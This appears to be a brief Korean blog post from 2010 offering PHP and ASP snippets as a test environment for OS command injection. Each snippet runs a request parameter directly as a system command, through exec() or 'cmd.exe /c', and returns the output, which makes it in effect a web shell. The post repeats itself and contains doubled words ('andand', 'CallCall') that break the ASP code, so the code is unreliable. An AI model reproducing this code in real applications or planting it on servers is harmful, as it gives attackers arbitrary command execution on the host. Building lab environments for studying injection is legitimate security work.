tips
OS Command Injection 환경예제
applicationlayer
2010. 1. 4. 14:05
PHP
<?php
$last = exec($param,$output,$return);
print_r($output);
echo "Return [$return]";
?>
ASP
<%
szCMD = request("tex")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szTempFile = "C:\ttt.txt"
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>
<HTML>
<BODY>
<PRE>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command andand remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
CallCall oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
<?php
$last = exec($param,$output,$return);
print_r($output);
echo "Return [$return]";
?>
ASP
<%
szCMD = request("tex")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szTempFile = "C:\ttt.txt"
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>
<HTML>
<BODY>
<PRE>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command andand remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
CallCall oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>